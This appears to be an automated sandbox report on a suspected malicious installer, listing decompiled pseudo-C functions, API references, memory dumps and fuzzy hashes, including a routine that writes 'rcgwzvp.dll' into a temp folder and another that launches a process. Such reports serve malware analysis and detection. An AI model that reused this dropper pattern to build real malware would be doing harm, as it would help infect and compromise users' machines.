					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405B25();
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                            0x00401bd3
                                            0x00401bdf
                                            0x00401be2
                                            0x00401beb
                                            0x00401beb
                                            0x00401bee
                                            0x00401bf2
                                            0x00401bfb
                                            0x00401bfb
                                            0x00401bfe
                                            0x00401c02
                                            0x00401c04
                                            0x00401c51
                                            0x00401c53
                                            0x00401c5c
                                            0x00401c64
                                            0x00401c67
                                            0x00401c67
                                            0x00401c70
                                            0x00000000
                                            0x00401c06
                                            0x00401c0d
                                            0x00401c0f
                                            0x00401c17
                                            0x00401c1a
                                            0x00401c42
                                            0x00401c76
                                            0x00401c76
                                            0x00401c1c
                                            0x00401c2a
                                            0x00401c32
                                            0x00401c35
                                            0x00401c35
                                            0x00401c1a
                                            0x00401c79
                                            0x00401c7c
                                            0x00401c82
                                            0x00402866
                                            0x00402866
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                            • SendMessageA.USER32 ref: 00401C42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                            • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
                                            • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                            • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004056BA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004056BA(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                            0x004056bb
                                            0x004056d2
                                            0x004056da
                                            0x004056da
                                            0x004056e2

                                            APIs
                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
                                            • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-3081826266
                                            • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                            • Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
                                            • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                            • Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 67%
                                            			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b054 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b05b = 1;
				 *0x40b058 = _t11 & 0x00000001;
				 *0x40b059 = _t11 & 0x00000002;
				 *0x40b05a = _t11 & 0x00000004;
				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b044);
				_push(_t14);
				_push(_t26);
				E00405B25();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                            0x00401d46
                                            0x00401d5f
                                            0x00401d69
                                            0x00401d6e
                                            0x00401d79
                                            0x00401d80
                                            0x00401d92
                                            0x00401d98
                                            0x00401d9d
                                            0x00401da7
                                            0x004024eb
                                            0x00401561
                                            0x00402866
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • GetDC.USER32(?), ref: 00401D3F
                                            • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                            • CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirect
                                            • String ID:
                                            • API String ID: 3272661963-0
                                            • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                            • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
                                            • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                            • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420c48; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42ec2c;
						if(_t2 >  *0x42ec2c) {
							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
							 *0x420c48 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F93(0);
					}
				} else {
					_t6 =  *0x420c48; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420c48 = 0;
					return _t6;
				}
			}






                                            0x00402bf8
                                            0x00402c12
                                            0x00402c18
                                            0x00402c22
                                            0x00402c28
                                            0x00402c2e
                                            0x00402c3f
                                            0x00402c48
                                            0x00000000
                                            0x00402c4d
                                            0x00402c54
                                            0x00402c1a
                                            0x00402c21
                                            0x00402c21
                                            0x00402bfa
                                            0x00402bfa
                                            0x00402c01
                                            0x00402c04
                                            0x00402c04
                                            0x00402c0a
                                            0x00402c11
                                            0x00402c11

                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                            • GetTickCount.KERNEL32 ref: 00402C22
                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                            • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
                                            • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                            • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 729117B0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 65%
                                            			E729117B0(intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, char _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v64;
				intOrPtr _t65;
				intOrPtr _t91;

				_t65 = E72911200(_a4);
				_v20 = _t65;
				0x72910000(_a16, _a20, _a4);
				0x72910000("%p, %p, %p, %s, %p.\n", _a4, _a8, _a12, _t65);
				_v64 = 0x20;
				_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_a8 + 0x1c))))(_a8,  &_v64);
				if(_v8 < 0) {
					return _v8;
				}
				if(_a12 != 0) {
					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_a12 + 0x20))))(_a12, _a8, 0, 0x72914278,  &_v12);
					if(_v8 < 0) {
						_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_a12 + 0x20))))(_a12, _a8, 0, 0x72914268,  &_v16);
						if(_v8 >= 0) {
							_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0xc))))(_v16, 0, _a16, _a20);
							 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
						}
					} else {
						_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0xc))))(_v12, _v20 + 0xc, _v44, _v40, _a16, _a20);
						 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
					}
				} else {
					_v32 = _a16;
					_v28 = 0;
					_v24 = 0;
					_t91 = _v20 + 0xc;
					__imp__CoCreateInstanceEx(_t91, 0, _v44, _v36, 1,  &_v32);
					_v8 = _t91;
					 *_a20 = _v28;
				}
				return _v8;
			}
















                                            0x729117ba
                                            0x729117c2
                                            0x729117cd
                                            0x729117e7
                                            0x729117ef
                                            0x72911808
                                            0x7291180f
                                            0x00000000
                                            0x72911811
                                            0x7291181d
                                            0x7291187d
                                            0x72911884
                                            0x729118db
                                            0x729118e2
                                            0x729118fc
                                            0x7291190b
                                            0x7291190b
                                            0x72911886
                                            0x729118ab
                                            0x729118ba
                                            0x729118ba
                                            0x7291181f
                                            0x72911822
                                            0x72911825
                                            0x7291182c
                                            0x72911846
                                            0x7291184a
                                            0x72911850
                                            0x72911859
                                            0x72911859
                                            0x00000000

                                            APIs
                                            • CoCreateInstanceEx.OLE32(-0000000C,00000000,?,?,00000001,?), ref: 7291184A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.676320429.0000000072911000.00000020.00020000.sdmp, Offset: 72910000, based on PE: true
                                            • Associated: 00000000.00000002.676315009.0000000072910000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676327878.0000000072914000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676332981.0000000072915000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.676337588.0000000072917000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateInstance
                                            • String ID: $%p, %p, %p, %s, %p.
                                            • API String ID: 542301482-3768584736
                                            • Opcode ID: c0c44729a779db9c5c6658d78e21ed3c7ac6abec51ae9f100b13bfce09d03e76
                                            • Instruction ID: cb5d660a198c83a47e68be7fad9f85a80fff6cfdaf15ad46f4270ea385919b19
                                            • Opcode Fuzzy Hash: c0c44729a779db9c5c6658d78e21ed3c7ac6abec51ae9f100b13bfce09d03e76
                                            • Instruction Fuzzy Hash: 5E51A4B5A00109EFDB04DF99D890EAEB7B9FF8C304F148258F919A7354D730AA51CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404E03, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
							 *0x42a088 = _t22;
							E00405BC7(0x42a0a0, 0x42f000);
							E00405B25(0x42f000, _t22);
							E0040140B(6);
							E00405BC7(0x42f000, 0x42a0a0);
						}
						L11:
						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404782(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403ECF(0x413);
				return 0;
			}




                                            0x00404e0f
                                            0x00404e34
                                            0x00404e54
                                            0x00404e57
                                            0x00404e5a
                                            0x00404e71
                                            0x00404e77
                                            0x00404e7e
                                            0x00404e85
                                            0x00404e8c
                                            0x00404e91
                                            0x00404e97
                                            0x00000000
                                            0x00404ea7
                                            0x00404e41
                                            0x00404e94
                                            0x00404e94
                                            0x00000000
                                            0x00404e94
                                            0x00404e4d
                                            0x00404e4f
                                            0x00000000
                                            0x00404e4f
                                            0x00404e15
                                            0x00000000
                                            0x00000000
                                            0x00404e1c
                                            0x00000000

                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00404E39
                                            • CallWindowProcA.USER32 ref: 00404EA7
                                              • Part of subcall function 00403ECF: SendMessageA.USER32 ref: 00403EE1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                            • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
                                            • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                            • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a040 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                            0x004024f1
                                            0x004024f1
                                            0x004024f4
                                            0x0040250f
                                            0x004024f6
                                            0x004024f8
                                            0x004024fd
                                            0x00402504
                                            0x00402516
                                            0x0040268f
                                            0x0040268f
                                            0x0040251c
                                            0x0040252e
                                            0x004015a6
                                            0x004015a8
                                            0x00000000
                                            0x004015ae
                                            0x004015a8
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll, xrefs: 004024FD, 00402522
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileWritelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll
                                            • API String ID: 427699356-4043730884
                                            • Opcode ID: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                            • Instruction ID: 02596e95378ee295436ef63fdf7a12543175d591b2ab5856f5875b5858eb07cb
                                            • Opcode Fuzzy Hash: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                            • Instruction Fuzzy Hash: A7F082B2A04244BFD710EFA59E49AEF7668DB40348F20043BF142B51C2E6BC99419B6E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405427, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405427(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                            0x00405430
                                            0x0040544c
                                            0x00405454
                                            0x00405459
                                            0x00000000
                                            0x0040545f
                                            0x00405463

                                            APIs
                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                            • CloseHandle.KERNEL32(?), ref: 00405459
                                            Strings
                                            • Error launching installer, xrefs: 0040543A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                            • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
                                            • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                            • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403585, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403585() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42905c;
				_t3 = E0040356A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42905c =  *0x42905c & 0x00000000;
				return _t3;
			}







                                            0x00403586
                                            0x0040358e
                                            0x00403595
                                            0x00403598
                                            0x00403598
                                            0x0040359a
                                            0x0040359f
                                            0x004035a6
                                            0x004035ac
                                            0x004035b0
                                            0x004035b1
                                            0x004035b9

                                            APIs
                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
                                            • GlobalFree.KERNEL32 ref: 004035A6
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 1100898210-3081826266
                                            • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                            • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
                                            • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                            • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405701, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405701(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                            0x00405702
                                            0x0040570c
                                            0x0040570e
                                            0x00405715
                                            0x0040571d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040571d
                                            0x0040571f
                                            0x00405724

                                            APIs
                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DN_467842234567.exe,C:\Users\user\Desktop\DN_467842234567.exe,80000000,00000003), ref: 00405707
                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DN_467842234567.exe,C:\Users\user\Desktop\DN_467842234567.exe,80000000,00000003), ref: 00405715
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-224404859
                                            • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                            • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
                                            • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                            • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

